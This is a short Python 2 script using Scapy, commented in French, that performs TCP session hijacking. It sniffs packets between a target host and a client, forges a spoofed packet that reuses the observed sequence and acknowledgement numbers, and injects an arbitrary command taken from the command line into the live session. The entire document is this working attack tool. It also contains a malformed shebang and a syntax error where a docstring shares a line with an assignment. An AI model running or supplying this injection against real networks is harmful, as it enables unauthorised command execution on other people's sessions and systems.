#Basic Hijacking Script
#Use Scapy
#!usr/bin/env/python

from scapy.all import *
import sys

"""Filtre a appliqué au Sniffer"""
filtre = "host " + sys.argv[1] + " and port " + sys.argv[2]
print "Waiting For Hosts " + sys.argv[1] + " > " + sys.argv[3] + " And Port " + sys.argv[2]
print " "

def hijack(p):
 cmd=sys.argv[4] """On Stock la commande a executer"""

 """Si la Source est celle de la cible (ici, le serveur par exemple) et la destination celle du client"""
 if p[IP].src==sys.argv[1] and p[IP].dst==sys.argv[3]:
    print "[+] Found!"
    print "Seq: " + str(p[TCP].seq) + " | Ack: " + str(p[TCP].ack)
    """Seq = Seq_du_paquet_precedent + Len_des_Datas"""
    print "Hijack Seq: " + str(p[TCP].ack) + " |  Hijack Ack: " + str(p[TCP].seq)
    print " "
    print "[+] Hijack Session!"

    """On forge un Paquet pour notre attaque a partir du paquet reçu de la cible"""
    """Ethernet"""
    ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
    """IP"""
    ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=29321)
    """TCP"""
    tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)

    """On forme le paquet final et on l'envoie"""
    hijack = ether/ip/tcp/(cmd+"\n")
    sendp(hijack)
    """On sort du script"""
    sys.exit()
    
"""Sniffer qui applique a chaques paquets reçu la fonction hijack, paquets trier selon le filtre"""
sniff(count=0,prn = lambda p : hijack(p),filter=filtre,lfilter=lambda(f): f.haslayer(IP) and f.haslayer(TCP))